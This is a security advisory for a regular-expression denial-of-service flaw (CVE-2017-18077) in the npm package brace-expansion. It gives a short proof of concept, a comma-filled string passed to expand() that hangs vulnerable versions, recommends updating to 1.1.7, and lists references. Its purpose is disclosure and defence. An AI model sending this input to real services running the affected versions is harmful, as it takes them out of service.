GHSA-832h-xg76-4gv6
Dashboard / Vulnerabilities / GHSA-832h-xg76-4gv6
Summary: ReDoS in brace-expansion
Details: Affected versions of `brace-expansion` are vulnerable to a regular expression denial of service condition. ## Proof of Concept ``` var expand = require('brace-expansion'); expand('{,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,\n}'); ``` ## Recommendation Update to version 1.1.7 or later.
References: https://nvd.nist.gov/vuln/detail/CVE-2017-18077, https://github.com/juliangruber/brace-expansion/issues/33, https://github.com/juliangruber/brace-expansion/pull/35, https://github.com/juliangruber/brace-expansion/pull/35/commits/b13381281cead487cbdbfd6a69fb097ea5e456c3, https://bugs.debian.org/862712, https://github.com/advisories/GHSA-832h-xg76-4gv6, https://github.com/juliangruber/brace-expansion, https://www.npmjs.com/advisories/338
Affected packages
Package
Name: brace-expansion
Purl: pkg:npm/brace-expansion
Affected ranges
Type: SEMVER
Events:
